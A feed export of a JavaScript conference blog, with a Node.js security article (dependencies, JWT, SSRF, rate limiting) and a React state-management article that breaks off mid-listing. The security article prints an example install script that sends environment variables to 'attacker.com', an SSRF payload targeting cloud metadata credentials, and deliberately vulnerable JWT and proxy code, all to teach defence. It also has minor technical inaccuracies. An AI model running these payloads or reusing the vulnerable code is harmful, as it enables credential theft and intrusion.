Preventing Dependency Risks and Authentication Flaws in Node.js https://javascript-conference.com/blog/node-js-dependency-authentication-security-part-2/ Tue, 05 Aug 2025 12:04:38 +0000 https://javascript-conference.com/?p=108252 Node.js revolutionized the web development paradigm with its event-driven, non-blocking architecture and is used for building scalable applications. But with its popularity, comes more attention from malicious actors looking to take advantage of vulnerabilities. This article examines the growing security challenge surrounding dependency risks, authentication flaws, rate limiting, and more.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
In Part 1 of our series, we explored some of the most common attack vectors against Node.js applications, from SQL injection, NoSQL injection, to Cross-Site Scripting (XSS) attacks. But these threats are not the only security issues that Node.js developers face today; they are only a part of it.

In this second part of our series, we will discuss lesser known, but no less dangerous threats that are specifically targeted at Node.js applications. From prototype pollution to insecure deserialization, authentication flaws to server-side request forgery – understanding these threats and their remediation strategies is crucial for secure application development in the current threat environment. Learn all about these Node.js security risks and how to prevent them.

Dependency Risks in the JavaScript Ecosystem

Problems with the JavaScript ecosystem are heavily dependent on dependencies. A typical Node.js project depends on hundreds of third-party packages, which is a huge attack surface that isn’t contained in your own code. This has been shown to be the case with recent supply chain attacks on popular npm packages. Not all security threats can be guarded against, but frameworks like Express.js, Fastify, and NestJS do provide some protection. Nevertheless, the duty is left to developers to ensure that they include security checks and measures in every stage of the application development process.

Topic 1 – Node.js Security & Dependency Management Vulnerabilities

Outdated Packages and Security Implications

It’s normal for modern Node.js applications to depend on several dozen or even hundreds of dependencies. Each outdated package is a potential security hole that’s left unpatched in your application.

The npm ecosystem is quite dynamic and vulnerabilities are often uncovered and patched within widely used packages. This means that dependencies that aren’t regularly updated can put your application at risk of being exploited while the fix is available.

Example: Say a team is using the popular lodash package v4.17.15 in their application. This package version has a prototype pollution vulnerability that was fixed in version 4.17.19. This vulnerability lets attackers manipulate prototypes of JavaScript objects and, in certain circumstances, cause application crashes or even remote code execution.

This type of vulnerability is particularly dangerous because lodash is a dependency of over 150,000 other packages, which means it’s spread throughout the ecosystem. The longer teams delay updates, the longer their applications are vulnerable.

Mitigation Strategy: Audit the packages at regular time intervals.

# Identify vulnerabilities in your dependencies

npm audit

# Fix vulnerable dependencies

npm audit fix

# For major version updates that npm audit fix can't automatically resolve

npm audit fix --force

Supply Chain Attacks

Supply chain attacks focus on the trusting relationship between developers and package maintainers. Malicious actors inject code into the supply chain to compromise a trusted package or its distribution channel.

Example Scenario: The event-stream incident of 2018 demonstrated the risks perfectly. A malicious actor was able to gain the trust of the package maintainer and was granted publishing rights to the package. They injected cryptocurrency stealing code that targeted Copay Bitcoin wallet users.

Attack Workflow:

  1. Attacker identifies a popular package with an inactive maintainer
  2. Attacker offers to help maintain the package
  3. Original maintainer grants publishing rights
  4. Attacker publishes a new version with malicious code
  5. Downstream applications automatically update to the compromised version

Mitigation Strategies: In package.json, use exact versions instead of ranges.

//In package.json, use exact versions instead of ranges

{

  "dependencies": {

    "express": "4.17.1",  // Good: exact version

    "lodash": "^4.17.20"  // Risky: accepts any 4.17.x version above 4.17.20

  }

}

//Use package-lock.json or npm shrinkwrap to lock all dependencies 

//Example using npm-package-integrity:




const integrity = require('npm-package-integrity');

integrity.check('./package.json').then(results => {

  if (results.compromised.length > 0) {

    console.error('Compromised packages detected:', results.compromised);

    process.exit(1);

  }

});

Dependency Confusion Attacks

Dependency confusion attacks occur when package managers download dependencies from both public and private registries and can result in the use of public packages when there are private packages with higher versions available. This can happen when there’s a private package name in the public registry with a higher version and the package manager could pull the public version.

Example Attack Scenario: Your company uses a private package called @company/api-client 1.2.3. The attacker identifies this package name in your public repository’s package.json and releases a malicious package with the same name but version 2.0.0 to the public npm registry. When you install the malicious package, npm will find the higher version in the public registry and install the package from the attacker.

Example Workflow:

  1. When you install a malicious package, the attacker might run a script when the package is installed.
// Malicious package preinstall script

// This runs automatically when the package is installed

const fs = require('fs');

const https = require('https');




// Stealing environment variables

const data = JSON.stringify({

  env: process.env,

  path: process.cwd()

});




// Sending data to attacker's server

const req = https.request({

  hostname: 'attacker.com',

  port: 443,

  path: '/collect',

  method: 'POST',

  headers: {'Content-Type': 'application/json'}

}, res => {});




req.write(data);

req.end();

Mitigation Strategies:

Use Scoped Packages: Scoped packages in npm help ensure that your packages are uniquely identified. For example, use @yourcompany/package-name instead of just package-name.

{

  "name": "my-project",

  "version": "1.0.0",

  "dependencies": {

    "@yourcompany/internal-package": "1.2.3"

  },

  "publishConfig": {

    "registry": "https://registry.yourcompany.com"

  }

}

In this example, the following measures are taken:

  • The package is scoped with @yourcompany to ensure uniqueness.
  • The publishConfig ensures that the package manager uses your private registry.

Topic 2 – Authentication Flaws Threatening Node.js Security

JSON Web Token (JWT) Vulnerabilities – JWTs are among the most common means of authentication in Node.js apps, particularly for RESTful APIs. However, this can be done incorrectly.

Common JWT Vulnerabilities:

  1. Weak Signing Algorithms: None or insecure algorithms like HMAC with small keys.
  2. Insecure Token Storage: Saving tokens in localStorage instead of using HttpOnly cookies.
  3. Missing Token Validation: Invalidating tokens that have not been signed, expired or targeted.
  4. Hardcoded Secrets: Using hardcoded secrets in the source code.

Example of Vulnerable JWT Implementation:

const jwt = require('jsonwebtoken');

// Hardcoded secret in source code

const secret = 'mysecretkey';

app.post('/login', (req, res) => {  

  // Create token with no expiration or audience validation

  const token = jwt.sign({ userId: user.id }, secret);

  res.json({ token });

});

app.get('/protected', (req, res) => {

  try {

    // No token validation or structure checks

    const token = req.headers.authorization.split(' ')[1];

    const decoded = jwt.verify(token, secret);

    
    // No additional checks on decoded token content

    res.json({ data: 'Protected resource' });

  } catch (error) {

    res.status(401).json({ error: 'Unauthorized' });

  }

});

In the above example code, there are multiple issues:

Hard Coded Secret

  • Problem: The secret key is stored in the source code.
  • Risk: If the source code is revealed, the secret key can be easily guessed.

No Token Expiration

  • Problem: The JWT is created without an expiration date.
  • Risk: Once issued, tokens can be used for an indefinite period of time if they are compromised.

Plain Text Token Transmission

  • Problem: The token is sent in plaintext in the response.
  • Risk: If tokens aren’t sent over HTTPS, they can be easily intercepted.

No Token Validation or Structure Checks

  • Issue: The token is extracted and verified without checking its claims.
  • Risk: Malformed or tampered tokens can bypass security checks.

Improved code with Secure JWT Implementation:

const jwt = require('jsonwebtoken');

const fs = require('fs');

require('dotenv').config();




// Load JWT secret from environment variable

const secret = process.env.JWT_SECRET;

if (!secret || secret.length < 32) {

  throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');

}




app.post('/login', async (req, res) => {

  // Create token with proper claims

  const token = jwt.sign(

    { 

      userId: user.id,

      role: user.role

    },

    secret,

    { 

      expiresIn: '1h',

      issuer: 'my-app',

      audience: 'my-api',

      notBefore: 0

    }

  ); 

  // Send token in HttpOnly cookie

  res.cookie('token', token, {

    httpOnly: true,

    secure: process.env.NODE_ENV === 'production',

    sameSite: 'strict',

    maxAge: 3600000 // 1 hour

  });

  

  res.json({ message: 'Authentication successful' });

});




app.get('/protected', (req, res) => {

  try {

    // Extract token from cookie (not from headers)

    const token = req.cookies.token;

    

    if (!token) {

      return res.status(401).json({ error: 'Authentication required' });

    }  

    // Verify token with all necessary options

    const decoded = jwt.verify(token, secret, {

      issuer: 'my-app',

      audience: 'my-api'

    })    

    // Additional validation

    if (decoded.role !== 'admin') {

      return res.status(403).json({ error: 'Insufficient permissions' });

    }  

    res.json({ data: 'Protected resource' });

  } catch (error) {

    if (error.name === 'TokenExpiredError') {

      return res.status(401).json({ error: 'Token expired' });

    }

    res.status(401).json({ error: 'Invalid token' });

  }

});

This above code snippet demonstrates a strong focus on security through several measures:

  • Environment Variables: Some of the sensitive data like the JWT secret are stored in environment variables. This helps in avoiding the data being hardcoded and reduces the risk of exposure.
  • Secure Cookies: The JWT token is saved in an HttpOnly cookie with secure and SameSite=strict flags, making it immune to XSS and CSRF attacks.
  • Role Based Access Control: The implementation checks the user’s role before allowing access to the protected resources in the application. Only authorized users can access sensitive endpoints.

Topic 3 – Preventing SSRF Attacks in Node.js Security

Side Request Forgery (SSRF) is a type of vulnerability where attackers can make servers make requests to unintended targets. This is problematic in the Node.js environment since HTTP requests are easy to make, especially with libraries such as axios, request, got, node-fetch, and the native http/https modules.

SSRF attacks exploit server-side code that makes requests to other services, allowing attackers to:

  1. Access internal services behind firewalls that aren’t normally accessible from the internet.
  2. Scan internal networks and discover services on private networks.
  3. Interact with metadata services in cloud environments (e.g. AWS EC2 metadata service).
  4. Exploit trust relationships between the server and other internal services.

Common Attack Vectors

  1. URL Parameters in API Proxies: Many Node.js applications function as API gateways or proxies, forwarding requests to backend services.

Vulnerable Example:

const express = require('express');

const axios = require('axios');

const app = express();




app.get('/proxy', async (req, res) => {

  const url = req.query.url;

  try {

    // User can control the URL completely

    const response = await axios.get(url);

    res.json(response.data);

  } catch (error) {

    res.status(500).json({ error: error.message });

  }

});

In this example, an attacker could provide a URL pointing to an internal service, such as: GET /proxy?url=http://internal-admin-panel.local/users

Now let’s see a secure way of the implementation:

const express = require('express');

const axios = require('axios');

const URL = require('url').URL;

const app = express();




// Define allowed domains

const ALLOWED_HOSTS = ['api.trusted.com', 'public-service.org'];




app.get('/proxy', async (req, res) => {

  const url = req.query.url;

  

  try {

    // Validate URL format

    const parsedUrl = new URL(url);

    if (!ALLOWED_HOSTS.includes(parsedUrl.hostname)) {

      return res.status(403).json({ error: 'Domain not allowed' });

    } 

    // Proceed with request to allowed domain

    const response = await axios.get(url);

    res.json(response.data);

  } catch (error) {

    res.status(400).json({ error: 'Invalid URL or request failed' });

  }

});

In the example above, a few best practices were followed:

Domain Whitelisting:

  • Defines a list of allowed domains (ALLOWED_HOSTS).
  • Then we check if the hostname of the user-supplied URL is in this list before proceeding with the request.
  • Ensures that only requests to trusted domains are allowed, reducing the risk of SSRF attacks.
  • Prevents the application from making requests to unauthorized or potentially malicious domains.
  1. File Upload Services with Remote URL Support

Vulnerable Code:

app.post('/fetch-image', async (req, res) => {

  const imageUrl = req.body.imageUrl;

  

  try {

    // Downloads from any URL without validation

    const response = await axios.get(imageUrl, { responseType: 'arraybuffer' });

    const imageBuffer = Buffer.from(response.data);

    

    // Save to local storage

    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);

    res.json({ success: true });

  } catch (error) {

    res.status(500).json({ error: error.message });

  }

});

An attacker can supply a malicious URL that can force the server to make requests to internal services or endpoints that should not be accessed by the public. This can result in the exposure of sensitive information or internal networks.

Example Attack:

Example Attack:

POST /fetch-image

Body: { "imageUrl": "http://169.254.zzz.xxx/latest/meta-data/iam/security-credentials/" }

Secure Implementation/Fix

  • Validate URL Format: Use the URL constructor to make sure the URL is well formed. Disallow anything but http and https to avoid the possibility of harmful protocols being used.
  • DNS Resolution and IP Blocking: Look up the hostname to IP using dns lookup. Avoid using private networks (10.x.x.x, 172.16.x.x, 192.168.x.x, 127.x.x.x, 169.254.x.x) to avoid disclosing information that can be used to reach resources on the internal network and to prevent SSRF attacks.
  • Preventing Redirects: Set the maxRedirects property of the axios request to 0 to avoid redirect-based bypasses that can allow access to prohibited URLs.
const dns = require('dns').promises;




app.post('/fetch-image', async (req, res) => {

  const imageUrl = req.body.imageUrl;

  

  try {

    // 1. Validate URL format

    const parsedUrl = new URL(imageUrl);

    

    // 2. Only allow http/https protocols

    if (!['http:', 'https:'].includes(parsedUrl.protocol)) {

      return res.status(403).json({ error: 'Protocol not allowed' });

    }

    

    // 3. Resolve hostname to IP

    const { address } = await dns.lookup(parsedUrl.hostname);

    

    // 4. Block private IP ranges

    if (/^(10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|127\.|169\.254\.)/.test(address)) {

      return res.status(403).json({ error: 'Cannot access internal resources' });

    }

    

    // 5. Now safe to proceed

    const response = await axios.get(imageUrl, { 

      responseType: 'arraybuffer',

      maxRedirects: 0 // Prevent redirect-based bypasses

    });

    

    const imageBuffer = Buffer.from(response.data);

    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);

    res.json({ success: true });

  } catch (error) {

    res.status(400).json({ error: 'Invalid URL or request failed' });

  }

});

Topic 4 – Rate Limiting and DoS Protection

Attackers are known to launch traffic-based attacks on Node.js applications to knock or take over systems:

  1. Distributed Denial of Service (DDoS): Your server is flooded by many requests from so many attackers that legitimate users are unable to access the service.
  2. Brute Force Attempts: Attackers use automated tools to try and login to your application with random combinations of credentials in an attempt to guess the valid authentication credentials.
  3. Scraping and Harvesting: Your application is accessed by bots to make many requests to gather content from your application, affecting performance and data leakage.
  4. API Abuse: API requests to use up resources or to take advantage of the free tiers usually reserved for your application’s APIs.

Note: At the infrastructure level, solutions including AWS WAF, Cloudflare, or Nginx can provide better protection without imposing too much load on your application code. These services provide more sophisticated features like distributed rate limiting, traffic monitoring, and auto-scaling during attacks. But this article focuses only on application-level security policies.

Traffic Management Best Practices

Proper traffic management begins with rate limiting both in the application and infrastructure. This can be done in Node.js using the express-rate-limit middleware package.

const rateLimit = require('express-rate-limit');


const apiLimiter = rateLimit({

  windowMs: 15 * 60 * 1000,

  max: 100, // limit each IP to 100 requests per windowMs

  message: 'Too many requests, please try again later.'

});

app.use('/api/', apiLimiter); // Apply to all API endpoints

app.use('/api/', apiLimiter);

To have a finer level of control, set different rate limits on different endpoints depending on the level of sensitivity and resource requirement of the endpoints.

For instance, authentication endpoints are usually more secure than general content endpoints. Moreover, implement progressive delays for failed attempts and account lockout policies for persistent failures. The library node-rate-limiter-flexible helps enhance features like Redis-based distributed rate limiting for apps deployed on multiple servers.

Mitigating DoS Vulnerabilities

Set request size limits to prevent payload attacks:

app.use(express.json({ limit: '10kb' }));

app.use(express.urlencoded({ extended: true, limit: '10kb' }));

Use helmet for additional HTTP security headers:

const helmet = require('helmet');

app.use(helmet());

Infrastructure-Level Protection

Security is better to approach from the infrastructure-level and use the application-level security as the secondary layer. Options include:

  • Reverse Proxies: Nginx or HAProxy can serve as a barrier, perform rate limiting, and work as a middle layer between your clients and the application.
  • CDNs: Cloudflare or Fastly offers integrated DDoS protection and rate limiting.
  • Cloud Provider Solutions: AWS WAF, Azure Front Door or Google Cloud Armor can be used to monitor and filter traffic.
  • Load Balancers: It can be used to distribute traffic across multiple instances, increasing the load and filter suspicious requests.

Conclusion: Strengthening Node.js Security Layers

Node.js security is an evolving challenge; keeping up with remediation strategies is essential to protect your applications from modern attack vectors. As discussed in detail in this article, attackers are always looking for ways to exploit traffic vulnerabilities. Therefore, a layered approach is necessary. Key points to keep in mind include:

  • In-depth defense is essential: Combine application-level protections such as middleware and request limits are with infrastructure level defenses like reverse proxies, CDN, and WAF to create several layers of protection against traffic-based attacks on Node.js apps.
  • Understand attack patterns: This is only possible if you understand strategies like DDoS attacks, brute force attempts, API abuse, and resource exhaustion.
  • Balance security with usability: Set rate limits properly to prevent malicious traffic without affecting the service quality of legitimate users. Endpoints need different thresholds as per their risk and frequency of use.
  • Implement graduated responses: Step-by-step measures should be taken beginning with slight delays, temporary blockage, and permanent IP blockage for severe attackers as per the frequency and severity of suspicious activities.
  • Continuously monitor and adjust: Security is not set and forget—traffic patterns should be analyzed regularly, rate limits should be checked and altered, and protection mechanisms should be updated to address new threats and application requirements.
  • Leverage existing tools: Some recommended libraries include express-rate-limit, Cloudflare, or AWS WAF instead of developing your own and making potential critical errors during development.
  • Consider distributed applications: For applications deployed on several servers, the distributed rate limiting policy should be implemented using Redis or a similar technology to ensure that the whole infrastructure is uniformly protected.
  • Test your defenses: Regularly conduct penetration testing to verify the effectiveness of your rate limiting and DoS protection measures under realistic attack scenarios.

 

🔍 Frequently Asked Questions (FAQ)

1. What are the main dependency risks in Node.js applications?

Node.js applications often depend on hundreds of third-party packages, increasing their exposure to vulnerabilities. Outdated packages, supply chain compromises, and dependency confusion are among the most critical risks developers must mitigate.

2. How can outdated Node.js packages introduce security vulnerabilities?

Outdated packages may contain known vulnerabilities that attackers can exploit. For example, lodash v4.17.15 has a prototype pollution issue that was fixed in v4.17.19, affecting thousands of dependent packages.

3. What is a supply chain attack in the Node.js ecosystem?

A supply chain attack occurs when malicious code is injected into a trusted dependency, often through social engineering or takeover of an inactive package. This code propagates downstream, compromising applications that rely on the affected package.

4. How can developers prevent dependency confusion in npm?

To prevent dependency confusion, developers should use scoped packages (e.g., @company/package) and configure the publishConfig.registry field to enforce use of internal registries.

5. What are common JWT vulnerabilities in Node.js?

Frequent JWT vulnerabilities include hardcoded secrets, weak signing algorithms, lack of token validation, and insecure token storage. These flaws can lead to unauthorized access and token abuse.

6. How should JWTs be securely implemented in Node.js?

Secure JWT implementations use environment variables for secrets, set expiration and validation claims, and transmit tokens via HttpOnly cookies with strict flags to mitigate XSS and CSRF attacks.

7. What is Server-Side Request Forgery (SSRF) and how can it be exploited in Node.js?

SSRF exploits occur when an attacker manipulates the server into making unauthorized requests, potentially exposing internal services or metadata endpoints. This is often done via user-controlled URLs in APIs or file uploads.

8. How can developers mitigate SSRF in Node.js applications?

Mitigation techniques include domain whitelisting, validating URL protocols, resolving DNS to block private IPs, and disabling redirects in HTTP clients like Axios.

9. What are best practices for rate limiting in Node.js?

Use libraries like express-rate-limit to set per-IP request caps, apply stricter controls on authentication routes, and consider distributed rate limiting via Redis for multi-instance applications.

10.How can infrastructure-level protection enhance Node.js app security?

Infrastructural tools like AWS WAF, Cloudflare, and Nginx offer advanced rate limiting, request filtering, and DDoS protection beyond what app-level middleware can provide.

The post Preventing Dependency Risks and Authentication Flaws in Node.js appeared first on International JavaScript Conference.

]]>
What’s the Best Way to Manage State in React? https://javascript-conference.com/blog/react-state-management-context-zustand-jotai/ Wed, 30 Jul 2025 11:51:42 +0000 https://javascript-conference.com/?p=108242 No topic is as controversial in the React world as state management. Unlike many other topics, there aren’t just two camps. Solutions range from categorically rejecting central state management to implementing state management solutions with React’s built-in tools or lightweight libraries, right through to using heavyweight solutions that determine the entire application’s architecture. Let’s examine several state management approaches and use cases, focusing on lightweight solutions with a low overhead and a limited impact on the overall application.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Let’s start at the very beginning: Why is central state management necessary? This question is not exclusive to React; it arises from modern single-page frameworks’ component-based approaches. In these frameworks, components form the central building blocks of applications. Components can have their own state, which contains either the data to be presented in the browser or the status of UI elements. A frontend application usually contains a large number of small, loosely coupled, and reusable components that form a tree structure. The closer the components are to the root of the tree, the more they are integrated into the application’s structure and business logic.

The leaf components of the tree are usually UI components that take care of the display. The components need data to display. This data usually comes from a backend interface and is loaded by the frontend components. In theory, each component can retrieve its own data, but this results in a large number of requests to the backend. Instead, requests are usually bundled at a central point. The component forming the lowest common denominator, i.e., the parent component for all that need information from this backend interface, is typically the appropriate location for server communication and data management.

And this is precisely the problem leading to central state management. Data from the backend has to be transferred to the components handling the display. This data flow is handled by props, the dynamic attributes of the components. This channel also takes care of write communication: creating, modifying, and deleting data. This isn’t an issue if there are only a few steps between the data source and display, but the longer the path, the greater the coupling of the component tree. Some of the components between the source and the target have nothing to do with the data and simply pass it on. However, this significantly limits reusability. The concept of central state management solves this by eliminating the communication channel using props and giving child components direct access to the information. React’s Context API makes this shortcut possible.

Central state management has many use cases. It’s often used in applications that deal with data record management. This includes applications that manage articles and addresses, fleet management, smart home controls, and learning management applications. The one thing all use cases have in common is that the topic runs through the entire application and different components need to access the data. Central state management minimizes the number of requests, acts as a single source of truth, and handles data synchronization.

Can You Manage Central State in React Without Extra Libraries?

For a long time, the Redux library was the central state management solution, and it’s still popular today. With around 8 million weekly package downloads, the React bindings for Redux are ahead of popular libraries like TanStack Query with 5 million downloads or React Hook Form with 6.5 million downloads. Overall, Redux downloads have been stagnating for some time. This is partly due to Redux’s somewhat undeserved bad reputation. The library has long been accused of causing unnecessary overhead, which prompted Dan Abramov, one of its developers, to write his famous article entitled “You might not need Redux.” Essentially, he says that Redux does involve a certain amount of overhead, but it quickly pays off in large applications. Extensions like the Redux Toolkit also further reduce the extra effort.

The lightest Redux alternative consists of a custom implementation based on React’s Context API and State Hook. The key advantage is that you don’t need any additional libraries. For example, let’s imagine a shopping cart in a web shop. The cart is one of the shop’s central elements and you need to be able to access it from several different places. In the shop, you should be able to add products to the cart using a list. The list shows the number of items currently in the shopping cart. An overview component shows how many products are in the cart and the total value. Both components – the list and the overview – should be independent of each other but always show the latest information.

Without React’s Context API, the only solution is to store shopping cart data in the state of a component that’s a parent to both components. Then, this passes its state to the components using props. This creates a very right coupling between these components. A better solution is based on the Context API. For this, you need the context, which you create with the createContext function. The provider component of the context binds it to the component tree, supplies it with a concrete value, and allows child components to access it. Since React 19, the context object can also be used directly as a provider. This eliminates needing to take a detour with the context’s provider component. With useContext (or, since React 19, the use function), you can access the context. Listing 1 shows the implementation of CartContext.

Listing 1: Implementing CartContext

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useState,
} from 'react';
import { Cart } from './types/Cart';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

The idea behind React’s Context API is that you can store any structure and access it from all child components. The structure can be a simple value like a number or a string, but objects, arrays, and functions are also allowed. In our example, the cart’s state structure is in the context. As usual in React, this is a tuple consisting of the state object, which you can use to read the state, and a function that can change the state. The CartContext can either contain the state structure or the value null. When you call the createContext function, you pass null as the default value. This lets you check if the context provider has been correctly integrated.

The CartProvider component defines the cart state and passes it as a value to the context. It accepts children in the form of a ReactNode object. This lets you integrate the CartProvider component into your component tree and gives all child components access to the context.

The last implementation component is a hook function called useCart. This controls access to the context. The use function provides the context value. If the value is null, it indicates that you should use useCart outside of CartProvider. In this case, the function throws an exception instead of returning the state value.

What does the application code look like when you want to access the state? We’ll use the ListItem component as an example. It accesses the context in both read and write mode. Listing 2 shows the simplified source code for the component.

Listing 2: Accessing the context

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);

  const [cart, setCart] = useCart();

  function addToCart() {
    const quantity = Number(inputRef.current?.value);
    if (quantity) {
      setCart((prev) => ({
        items: [
          ...prev.items.filter((item) => item.id !== product.id),
          {
            ...product,
            quantity,
          },
        ],
      }));
    }
  }

  return (
    <li>
      {product.name}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />
      <button onClick={addToCart}>add</button>
    </li>
  );
};

export default ListItem;

The ListItem component represents each entry in the product list and displays the product name and an input field where you can specify the number of products you want to add to the shopping cart. When you click the button, the component’s addToCart function updates the cart context. This is possible by using the useCart function to access the state of the shopping cart and entering the current product quantity in the input field. Use the setCart function to update the context.

One disadvantage of this implementation is that the ListItem component has to know the CartContext precisely and performs the state update in the callback function of the setCart function. You can solve this by outsourcing this block as a function. Here, the ListItem component can access the functionality as well as every component in the application.

How Do You Synchronize React State with Server Communication?

This solution only works locally in the browser. If you close the window or if a problem occurs, the current shopping cart disappears. You can solve this by applying the actions locally to the state and saving the operations on the server. But this makes implementation a little more complex. When loading the component structure, you must load the currently valid shopping cart from the server and save it to the state. Then, apply each change both on the server side and in the local state. Although this results in some overhead, the advantage is that the current state can be restored at any time, regardless of the browser instance. If you implement the addToCart functionality as a separate hook function, the components remain unaffected by this adjustment.

Listing 3: Implementing the addToCart Functionality

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useEffect,
  useRef,
  useState,
} from 'react';
import { Cart } from './types/Cart';
import { Product } from './types/Product';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  useEffect(() => {
    fetch('http://localhost:3001/cart')
      .then((response) => response.json())
      .then((data) => cart[1](data));
  }, []);

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart(
  product: Product
): [React.RefObject<HTMLInputElement | null>, () => void] {
  const [cart, setCart] = useCart();
  const inputRef = useRef<HTMLInputElement>(null);

  function addToCart() {
    const quantity = Number(inputRef.current?.value);

    if (quantity) {
      const updatedItems = [
        ...cart.items.filter((item) => item.id !== product.id),
        { ...product, quantity },
      ];

      fetch('http://localhost:3001/cart', {
        method: 'PUT',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ id: 1, items: updatedItems }),
      })
        .then((response) => response.json())
        .then((data) => setCart(data));
    }
  }

  return [inputRef, addToCart] as const;
}

The CartProvider component loads the current shopping cart from the server. How users access the shopping cart depends upon the specific interface implementation. The code in the example assumes that the server makes the shopping cart available for the current user via /cart. One potential solution is to differentiate between users using cookies. The second adjustment consists of the useAddToCart function. It receives a product and generates the addToCart function and the ref for the input field. In the addToCart function, the shopping cart is updated locally, sent to the server, and then the local state is set by calling the setCart function. During implementation, we assume the shopping cart is updated via a PUT request to /cart and that this interface returns the updated shopping cart.

Implementation using a combination of context and state is suitable for manageable use cases. It’s lightweight and flexible, but large applications run the risk of the central state becoming chaotic. One possible fix is no longer exposing the function for modifying the state externally, but using the useReducer hook instead.

How Can You Manage React State Using Actions?

React offers another hook for component state management with the useReducer hook. This differs from the more commonly used useState hook and does not provide a function for changing the state. Instead, it returns a tuple of readable state and a dispatch function. When you call the useReducer function, you pass a reducer function whose task is to generate a new state from the previous state and an action object.

The action object describes the change, like adding products to the shopping cart. Actions are usually simple JavaScript objects with the properties type and payload. The type property specifies the type of action, and the payload provides additional information.

The reducer hook is intended for local state management, but you can easily integrate asynchronous server communication. However, it’s recommended that you separate synchronous local operations from asynchronous server-based operations. The reducer should be a pure function and free of side effects. This means that the same inputs always result in the same outputs and the current state is only changed based on the action provided. If you stick to this rule, your code will be clearer and better structured, and error handling is easier. You’ll also be more flexible when it comes to future software extensions. Listing 4 shows an implementation of state management with the useReducer hook.

Listing 4: Using the useReducer-Hooks

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  useContext,
  useEffect,
  useReducer,
} from 'react';
import { Cart, CartItem } from './types/Cart';

const SET_CART = 'setCart';
const ADD_TO_CART = 'addToCartAsync';
const FETCH_CART = 'fetchCart';

type FetchCartAction = {
  type: typeof FETCH_CART;
};

type SetCartAction = {
  type: typeof SET_CART;
  payload: Cart;
};

type AddToCartAsyncAction = {
  type: typeof ADD_TO_CART;
  payload: CartItem;
};

type CartAction = FetchCartAction | SetCartAction | AddToCartAsyncAction;

type CartContextType = [Cart, Dispatch<CartAction>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};

function cartReducer(state: Cart, action: CartAction): Cart {
  switch (action.type) {
    case SET_CART:
      return action.payload;

    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
}

function cartMiddleware(dispatch: Dispatch<CartAction>, cart: Cart) {
  return async function (action: CartAction) {
    switch (action.type) {
      case FETCH_CART: {
        const response = await fetch('http://localhost:3001/cart');
        const data = await response.json();
        dispatch({ type: SET_CART, payload: data });
        break;
      }
      case ADD_TO_CART: {
        const response = await fetch('http://localhost:3001/cart', {
          method: 'PUT',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            items: [...cart.items, action.payload],
          }),
        });

        const updatedCart = await response.json();
        dispatch({ type: SET_CART, payload: updatedCart });
        break;
      }
      default:
        dispatch(action);
    }
  };
}

export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const [cart, dispatch] = useReducer(cartReducer, { items: [] });
  const enhancedDispatch = cartMiddleware(dispatch, cart);

  useEffect(() => {
    enhancedDispatch({ type: FETCH_CART });
  }, []);

  return (
    <CartContext.Provider value={[cart, enhancedDispatch]}>
      {children}
    </CartContext.Provider>
  );
};

export function useCart() {
  const context = useContext(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart() {
  const [, dispatch] = useCart();

  const addToCart = (item: CartItem) => {
    dispatch({ type: ADD_TO_CART, payload: item });
  };

  return addToCart;
}

The CartProvider component is the starting point for implementation. It holds the context and creates the state using the useReducer hook. It also uses the FETCH_CART action to ensure that the existing shopping cart is loaded from the server. The code has two parts: the reducer itself and a middleware. The reducer takes the form of the cartReducer function and is responsible for the local state. It consists of a switch statement and, in this simple example, supports the SET_CART action, which sets the shopping cart. What’s more interesting though is the cartMiddleware function. This is responsible for the asynchronous actions FETCH_CART and ADD_TO_CART. Unlike the reducer, the middleware cannot access the state directly, but must pass changes to the reducer via actions. To do this, it uses the dispatch function from the useReducer hook. The middleware can also have side effects such as asynchronous server communication. For example, the FETCH_CART action triggers a GET request to the server to retrieve the data from the current shopping cart. Once the data is available, it’s written to the local state using the SET_CART action.

If the middleware isn’t responsible for a received action, it passes it directly to the reducer so that you don’t need to distinguish between the two in the application and can simply use the middleware.

The useCart and useAddToCart functions are the interfaces between the application components and the reducer. Listing 5 shows how to use the reducer implementation in your components.

Listing 5: Integrating the reducer implementation

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart, useAddToCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const [cart] = useCart();
  const addToCart = useAddToCart();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
